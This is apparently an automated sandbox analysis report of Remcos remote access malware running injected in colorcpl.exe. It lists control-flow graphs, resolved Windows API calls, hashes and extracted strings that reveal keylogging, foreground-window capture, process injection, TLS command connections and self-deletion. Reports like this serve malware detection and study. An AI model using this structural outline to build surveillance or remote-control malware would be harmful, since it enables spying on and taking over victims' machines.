                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 4236061018-3687161714
                                                          • Opcode ID: 538e7d42190ad987349cd2223325f4eb952dc70728342b0297674e61e56d039e
                                                          • Instruction ID: 3212b1f93a01434237c7940f89c008cf9a09701cdcc30cc7af373b61d66c5580
                                                          • Opcode Fuzzy Hash: 538e7d42190ad987349cd2223325f4eb952dc70728342b0297674e61e56d039e
                                                          • Instruction Fuzzy Hash: 0441CAA1E8136C79FA90FBB75C4ED1F3F5CDD41AD87010817B316A7224DAB8D8048EA8

                                                          Control-flow Graph

                                                          control_flow_graph 5 2f9ea00-2f9ea82 call 2facbe1 GetModuleFileNameW call 2f9f3fe call 2f920f6 * 2 call 2fabeac call 2f9fb52 call 2f91e8d call 2fcfd50 22 2f9eace-2f9eb96 call 2f91e65 call 2f91fab call 2f91e65 call 2f9531e call 2f96383 call 2f91fe2 call 2f91fd8 * 2 call 2f91e65 call 2f91fc0 call 2f95aa6 call 2f91e65 call 2f951e3 call 2f91e65 call 2f951e3 5->22 23 2f9ea84-2f9eac9 call 2f9fbee call 2f91e65 call 2f91fab call 2fa0f72 call 2f9fb9f call 2f9f3eb 5->23 69 2f9ebe9-2f9ec04 call 2f91e65 call 2f9b9f8 22->69 70 2f9eb98-2f9ebe3 call 2f96c59 call 2f91fe2 call 2f91fd8 call 2f91fab call 2fa3584 22->70 49 2f9ef2d-2f9ef3e call 2f91fd8 23->49 79 2f9ec3e-2f9ec45 call 2f9d0a4 69->79 80 2f9ec06-2f9ec25 call 2f91fab call 2fa3584 69->80 70->69 100 2f9f38a-2f9f3a5 call 2f91fab call 2fa39e4 call 2fa24b0 70->100 88 2f9ec4e-2f9ec55 79->88 89 2f9ec47-2f9ec49 79->89 80->79 99 2f9ec27-2f9ec3d call 2f91fab call 2fa39e4 80->99 93 2f9ec59-2f9ec65 call 2fab354 88->93 94 2f9ec57 88->94 92 2f9ef2c 89->92 92->49 104 2f9ec6e-2f9ec72 93->104 105 2f9ec67-2f9ec69 93->105 94->93 99->79 126 2f9f3aa-2f9f3db call 2fabcef call 2f91f04 call 2fa3a5e call 2f91f09 * 2 100->126 108 2f9ecb1-2f9ecc4 call 2f91e65 call 2f91fab 104->108 109 2f9ec74 call 2f97751 104->109 105->104 127 2f9eccb-2f9ed53 call 2f91e65 call 2fabcef call 2f91f13 call 2f91f09 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab 108->127 128 2f9ecc6 call 2f97790 108->128 117 2f9ec79-2f9ec7b 109->117 120 2f9ec7d-2f9ec82 call 2f97773 call 2f9729b 117->120 121 2f9ec87-2f9ec9a call 2f91e65 call 2f91fab 117->121 120->121 121->108 141 2f9ec9c-2f9eca2 121->141 156 2f9f3e0-2f9f3ea call 2f9dd7d call 2fa4f65 126->156 177 2f9edbb-2f9edbf 127->177 178 2f9ed55-2f9ed6e call 2f91e65 call 2f91fab call 2fcbb56 127->178 128->127 141->108 144 2f9eca4-2f9ecaa 141->144 144->108 147 2f9ecac call 2f9729b 144->147 147->108 179 2f9ef41-2f9efa1 call 
2fc6f10 call 2f9247c call 2f91fab * 2 call 2fa3733 call 2f99092 177->179 180 2f9edc5-2f9edcc 177->180 178->177 203 2f9ed70-2f9edb6 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f9da6f call 2f91f13 call 2f91f09 178->203 234 2f9efa6-2f9effa call 2f91e65 call 2f91fab call 2f92093 call 2f91fab call 2fa37aa call 2f91e65 call 2f91fab call 2fcbb2c 179->234 183 2f9ee4a-2f9ee54 call 2f99092 180->183 184 2f9edce-2f9ee48 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f9ce34 180->184 193 2f9ee59-2f9ee7d call 2f9247c call 2fc4829 183->193 184->193 211 2f9ee8c 193->211 212 2f9ee7f-2f9ee8a call 2fc6f10 193->212 203->177 217 2f9ee8e-2f9eed9 call 2f91f04 call 2fcf859 call 2f9247c call 2f91fab call 2f9247c call 2f91fab call 2fa3982 211->217 212->217 272 2f9eede-2f9ef03 call 2fc4832 call 2f91e65 call 2f9b9f8 217->272 286 2f9effc 234->286 287 2f9f017-2f9f019 234->287 272->234 288 2f9ef09-2f9ef28 call 2f91e65 call 2fabcef call 2f9f4af 272->288 289 2f9effe-2f9f015 call 2face2c CreateThread 286->289 290 2f9f01b-2f9f01d 287->290 291 2f9f01f 287->291 288->234 306 2f9ef2a 288->306 294 2f9f025-2f9f101 call 2f92093 * 2 call 2fab580 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2fcbb2c call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab StrToIntA call 2f99e1f call 2f91e65 call 2f91fab 289->294 290->289 291->294 344 2f9f13c 294->344 345 2f9f103-2f9f13a call 2fc455e call 2f91e65 call 2f91fab CreateThread 294->345 306->92 346 2f9f13e-2f9f156 call 2f91e65 call 2f91fab 344->346 345->346 356 2f9f158-2f9f18f call 2fc455e call 2f91e65 call 2f91fab CreateThread 346->356 357 2f9f194-2f9f1a7 call 2f91e65 call 2f91fab 346->357 356->357 367 2f9f1a9-2f9f202 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2f9da23 call 2f91f13 call 2f91f09 CreateThread 357->367 368 2f9f207-2f9f21a call 2f91e65 call 2f91fab 
357->368 367->368 379 2f9f21c-2f9f250 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2fcbb2c call 2f9c19d 368->379 380 2f9f255-2f9f279 call 2fab69e call 2f91f13 call 2f91f09 368->380 379->380 400 2f9f27b-2f9f27c SetProcessDEPPolicy 380->400 401 2f9f27e-2f9f291 CreateThread 380->401 400->401 404 2f9f29f-2f9f2a6 401->404 405 2f9f293-2f9f29d CreateThread 401->405 409 2f9f2a8-2f9f2b2 CreateThread 404->409 410 2f9f2b4-2f9f2bb 404->410 405->404 409->410 413 2f9f2c9 410->413 414 2f9f2bd-2f9f2c0 410->414 418 2f9f2ce-2f9f302 call 2f92093 call 2f952fd call 2f92093 call 2fab580 call 2f91fd8 413->418 415 2f9f2c2-2f9f2c7 414->415 416 2f9f307-2f9f31a call 2f91fab call 2fa353a 414->416 415->418 425 2f9f31f-2f9f322 416->425 418->416 425->156 427 2f9f328-2f9f368 call 2fabcef call 2f91f04 call 2fa3656 call 2f91f09 call 2f91f04 425->427 443 2f9f381-2f9f386 DeleteFileW 427->443 444 2f9f388 443->444 445 2f9f36a-2f9f36d 443->445 444->126 445->126 446 2f9f36f-2f9f37c Sleep call 2f91f04 445->446 446->443
                                                          APIs
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACBF6
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACBFF
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACC16
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC19
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC2B
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC2E
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC3F
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC42
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02F9EA1C), ref: 02FACC54
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC57
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02F9EA1C), ref: 02FACC63
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC66
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02F9EA1C), ref: 02FACC77
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC7A
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02F9EA1C), ref: 02FACC8B
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACC8E
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02F9EA1C), ref: 02FACC9F
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCA2
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02F9EA1C), ref: 02FACCB3
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCB6
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02F9EA1C), ref: 02FACCC7
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCCA
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02F9EA1C), ref: 02FACCDB
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCDE
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02F9EA1C), ref: 02FACCEF
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACCF2
                                                            • Part of subcall function 02FACBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02F9EA1C), ref: 02FACD03
                                                            • Part of subcall function 02FACBE1: GetProcAddress.KERNEL32(00000000), ref: 02FACD06
                                                            • Part of subcall function 02FACBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02F9EA1C), ref: 02FACD14
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 02F9EA29
                                                            • Part of subcall function 02FA0F72: __EH_prolog.LIBCMT ref: 02FA0F77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                          • API String ID: 2830904901-2432426600
                                                          • Opcode ID: 0d51bdbdf17ee4b71c296934935e56bd03d7a24d590b28e6b7766f77ffb5a7e2
                                                          • Instruction ID: a66bd0492fdb6d1de28f6c8d34cc403bfcbc4f8b87fe3dde9035776ea0c7746b
                                                          • Opcode Fuzzy Hash: 0d51bdbdf17ee4b71c296934935e56bd03d7a24d590b28e6b7766f77ffb5a7e2
                                                          • Instruction Fuzzy Hash: 7C32C070F082062AFE19B7709C69B6F769B4F817C4F40092DE7469B2D1EEA89D048F61

                                                          Control-flow Graph

                                                          control_flow_graph 448 2fa4f65-2fa4fad call 2f920df call 2fab944 call 2f920df call 2f91e65 call 2f91fab call 2fcbb2c 461 2fa4faf-2fa4fb6 Sleep 448->461 462 2fa4fbc-2fa5008 call 2f92093 call 2f91e65 call 2f920f6 call 2fabeac call 2f9489e call 2f91e65 call 2f9b9f8 448->462 461->462 477 2fa500a-2fa5079 call 2f91e65 call 2f9247c call 2f91e65 call 2f91fab call 2f91e65 call 2f9247c call 2f91e65 call 2f91fab call 2f91e65 call 2f9247c call 2f91e65 call 2f91fab call 2f9473d 462->477 478 2fa507c-2fa5117 call 2f92093 call 2f91e65 call 2f920f6 call 2fabeac call 2f91e65 * 2 call 2f96c59 call 2f92f10 call 2f91fe2 call 2f91fd8 * 2 call 2f91e65 call 2f95b05 462->478 477->478 531 2fa5119-2fa5125 478->531 532 2fa5127-2fa512e 478->532 533 2fa5133-2fa51c5 call 2f95aa6 call 2f9531e call 2f96383 call 2f92f10 call 2f92093 call 2fab580 call 2f91fd8 * 2 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2fa4f24 531->533 532->533 560 2fa5210-2fa521e call 2f9482d 533->560 561 2fa51c7-2fa520b WSAGetLastError call 2facb72 call 2f952fd call 2f92093 call 2fab580 call 2f91fd8 533->561 566 2fa524b-2fa5260 call 2f94f51 call 2f948c8 560->566 567 2fa5220-2fa5246 call 2f92093 * 2 call 2fab580 560->567 583 2fa5ade-2fa5af0 call 2f94e26 call 2f921fa 561->583 566->583 584 2fa5266-2fa53b9 call 2f91e65 * 2 call 2f9531e call 2f96383 call 2f92f10 call 2f96383 call 2f92f10 call 2f92093 call 2fab580 call 2f91fd8 * 4 call 2fab871 call 2fa45f8 call 2f99097 call 2fd1ed1 call 2f91e65 call 2f920f6 call 2f9247c call 2f91fab * 2 call 2fa3733 566->584 567->583 597 2fa5b18-2fa5b20 call 2f91e8d 583->597 598 2fa5af2-2fa5b12 call 2f91e65 call 2f91fab call 2fcbb2c Sleep 583->598 648 2fa53bb-2fa53c8 call 2f95aa6 584->648 649 2fa53cd-2fa53f4 call 2f91fab call 2fa35e1 584->649 597->478 598->597 648->649 655 2fa53fb-2fa57ba call 2f9417e call 2f9ddc4 call 2fabcd3 call 2fabdaf call 2fabc1f call 2f91e65 GetTickCount call 2fabc1f call 2fabb77 call 2fabc1f * 2 call 
2fabb27 call 2fabdaf * 5 call 2f9f90c call 2fabdaf call 2f92f31 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 * 3 call 2f92ea1 call 2f92f10 call 2f96383 call 2f92f10 call 2f96383 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f96383 call 2f92f10 * 5 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 * 7 call 2f92ea1 649->655 656 2fa53f6-2fa53f8 649->656 782 2fa57bc call 2f94aa1 655->782 656->655 783 2fa57c1-2fa5a45 call 2f91fd8 * 50 call 2f91f09 call 2f91fd8 * 6 call 2f91f09 call 2f94c10 782->783 901 2fa5a4a-2fa5a51 783->901 902 2fa5a53-2fa5a5a 901->902 903 2fa5a65-2fa5a6c 901->903 902->903 904 2fa5a5c-2fa5a5e 902->904 905 2fa5a78-2fa5aaa call 2f95a6b call 2f92093 * 2 call 2fab580 903->905 906 2fa5a6e-2fa5a73 call 2f9b08c 903->906 904->903 917 2fa5abe-2fa5ad9 call 2f91fd8 * 2 call 2f91f09 905->917 918 2fa5aac-2fa5ab8 CreateThread 905->918 906->905 917->583 918->917
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000029,030052F0,030050E4,00000000), ref: 02FA4FB6
                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 02FA51C7
                                                          • Sleep.KERNEL32(00000000,00000002), ref: 02FA5B12
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$ErrorLastLocalTime
                                                          • String ID: | $%I64u$5.1.3 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                          • API String ID: 524882891-3481364104
                                                          • Opcode ID: 54c1df0ea7a22e009d1917cf2468260d7211cfe78ef699f70fa0c1bc5e28f2ae
                                                          • Instruction ID: 66b932d7bec0bf868719cf2b12d0b0e37cf15f2384881f2ec6535c2d8abd004e
                                                          • Opcode Fuzzy Hash: 54c1df0ea7a22e009d1917cf2468260d7211cfe78ef699f70fa0c1bc5e28f2ae
                                                          • Instruction Fuzzy Hash: 7A526971A041195AEF28F731ECA1BEEB37A9F50384F5045A9D60AA71D4EF305F4ACE90

                                                          Control-flow Graph

                                                          APIs
                                                          • connect.WS2_32(?,?,?), ref: 02F948E0
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02F94A00
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02F94A0E
                                                          • WSAGetLastError.WS2_32 ref: 02F94A21
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $X=t
                                                          • API String ID: 994465650-865183690
                                                          • Opcode ID: 538b03fc24d066da8d8af044f1e564fd6b4f78c0168a587399321393fd7f0a59
                                                          • Instruction ID: a65083fe081593fe3505ced22a1b7c523d3f545ea4d144df817b6df4c7038b47
                                                          • Opcode Fuzzy Hash: 538b03fc24d066da8d8af044f1e564fd6b4f78c0168a587399321393fd7f0a59
                                                          • Instruction Fuzzy Hash: 4241D579B102067BBF147B7A8D1A42DBB57EF512C4B800168DB0247AA5EF51E8258FE3

                                                          Control-flow Graph

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 02F9AD73
                                                          • Sleep.KERNEL32(000001F4), ref: 02F9AD7E
                                                          • GetForegroundWindow.USER32 ref: 02F9AD84
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 02F9AD8D
                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 02F9ADC1
                                                          • Sleep.KERNEL32(000003E8), ref: 02F9AE8F
                                                            • Part of subcall function 02F9A671: SetEvent.KERNEL32(?,?,00000000,02F9B245,00000000), ref: 02F9A69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                          • API String ID: 911427763-3954389425
                                                          • Opcode ID: 8c2f68a4de5b83df365e89e231e2bd37ae459f0c36cad797cdcb73912fd0ca63
                                                          • Instruction ID: 0df0cc171e9221f72244cc59102f1d1014e937b5fac4d306857b20208f5df02c
                                                          • Opcode Fuzzy Hash: 8c2f68a4de5b83df365e89e231e2bd37ae459f0c36cad797cdcb73912fd0ca63
                                                          • Instruction Fuzzy Hash: BD51C171A042499BFF14FB34DC54A7EB7ABAF843C8F10092DE786931A0EF649944CE52

                                                          Control-flow Graph

                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 02F9DBD5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 6c228a0726fbda021933a40f70f6a0a3067be20286d1c2d2d60d11d7fe460bc7
                                                          • Instruction ID: d3a7aafcf5fa68e9f8e8fe9000980e34485ca094ef9618599442fe8ee7bb3a4e
                                                          • Opcode Fuzzy Hash: 6c228a0726fbda021933a40f70f6a0a3067be20286d1c2d2d60d11d7fe460bc7
                                                          • Instruction Fuzzy Hash: 774157312082055AFA45FB64DD51DAFF3EAAEA07D5F10052DF74A920A0FF609949CE52

                                                          Control-flow Graph

                                                          control_flow_graph 1214 2fab354-2fab3ab call 2fac048 call 2fa35e1 call 2f91fe2 call 2f91fd8 call 2f96b1c 1225 2fab3ee-2fab3f7 1214->1225 1226 2fab3ad-2fab3bc call 2fa35e1 1214->1226 1228 2fab3f9-2fab3fe 1225->1228 1229 2fab400 1225->1229 1230 2fab3c1-2fab3d8 call 2f91fab StrToIntA 1226->1230 1231 2fab405-2fab410 call 2f9537d 1228->1231 1229->1231 1236 2fab3da-2fab3e3 call 2facffa 1230->1236 1237 2fab3e6-2fab3e9 call 2f91fd8 1230->1237 1236->1237 1237->1225
                                                          APIs
                                                            • Part of subcall function 02FAC048: GetCurrentProcess.KERNEL32(?,?,?,02F9DAE5,WinDir,00000000,00000000), ref: 02FAC059
                                                            • Part of subcall function 02FA35E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02FA3605
                                                            • Part of subcall function 02FA35E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02FA3622
                                                            • Part of subcall function 02FA35E1: RegCloseKey.KERNEL32(?), ref: 02FA362D
                                                          • StrToIntA.SHLWAPI(00000000,02FFCA08,00000000,00000000,00000000,030050E4,00000003,Exe,00000000,0000000E,00000000,02FF60CC,00000003,00000000), ref: 02FAB3CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue
                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 1866151309-2070987746
                                                          • Opcode ID: 5250866101ff48dc79ce0037a90240e559ca20aa0451e6750e4ae2e71bd320a5
                                                          • Instruction ID: eaff605169588bccd480b22c53ddc7112cda5ef57664958574c799ae312d33c3
                                                          • Opcode Fuzzy Hash: 5250866101ff48dc79ce0037a90240e559ca20aa0451e6750e4ae2e71bd320a5
                                                          • Instruction Fuzzy Hash: E91159B0E4024A1AFB00F368CCA6E7F7B5B8F612C8F800126D707A31D0FB54580A8BE1

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 02F9A77B
                                                            • Part of subcall function 02F9A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02F9A788), ref: 02F9A6E6
                                                            • Part of subcall function 02F9A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02F9A788), ref: 02F9A6F5
                                                            • Part of subcall function 02F9A6B0: Sleep.KERNEL32(00002710,?,?,?,02F9A788), ref: 02F9A722
                                                            • Part of subcall function 02F9A6B0: CloseHandle.KERNEL32(00000000,?,?,?,02F9A788), ref: 02F9A729
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02F9A7B7
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 02F9A7C8
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02F9A7DF
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02F9A859
                                                            • Part of subcall function 02FAC516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02FF6478,?,00000000,00000000,00000000,00000000,00000000), ref: 02F9A962
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID:
                                                          • API String ID: 3795512280-0
                                                          • Opcode ID: 91139218005abf815b71415ac24a2165605351a92b712010769fd80af357e7b5
                                                          • Instruction ID: 22a45a30fee5d11b0154c625aa41f72e64dfb4ab4ffe68c58098a39503ddcd26
                                                          • Opcode Fuzzy Hash: 91139218005abf815b71415ac24a2165605351a92b712010769fd80af357e7b5
                                                          • Instruction Fuzzy Hash: 33517D716082095AFF15FB34CC64ABF73AB9F813C8F00092DE746971E1EF6499098E92

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,02FAC5A1,00000000,00000000,?), ref: 02FAC4C1
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,02F9A922,?,00000000,00000000), ref: 02FAC4DE
                                                          • CloseHandle.KERNEL32(00000000,?,02F9A922,?,00000000,00000000), ref: 02FAC4EA
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,02F9A922,?,00000000,00000000), ref: 02FAC4FB
                                                          • CloseHandle.KERNEL32(00000000,?,02F9A922,?,00000000,00000000), ref: 02FAC508
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                          • String ID:
                                                          • API String ID: 1852769593-0
                                                          • Opcode ID: 057525f76ab4f96b238024b59015c4ecb715da4135e85494f95c71a0cab5e959
                                                          • Instruction ID: 31cc30d0cf98f83b4a2794dc0098537d916bfe8a0111a23361da1f62143ee435
                                                          • Opcode Fuzzy Hash: 057525f76ab4f96b238024b59015c4ecb715da4135e85494f95c71a0cab5e959
                                                          • Instruction Fuzzy Hash: BB1108F2644115BFEB114A24EE98F7BB39CEB422E5F008A2BFB11D72C0C7608C008674

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,02F9A2B8,?,00000000,00000000), ref: 02F9A239
                                                          • CreateThread.KERNEL32(00000000,00000000,02F9A2A2,?,00000000,00000000), ref: 02F9A249
                                                          • CreateThread.KERNEL32(00000000,00000000,02F9A2C4,?,00000000,00000000), ref: 02F9A255
                                                            • Part of subcall function 02F9B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02F9B1AD
                                                            • Part of subcall function 02F9B19F: wsprintfW.USER32 ref: 02F9B22E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
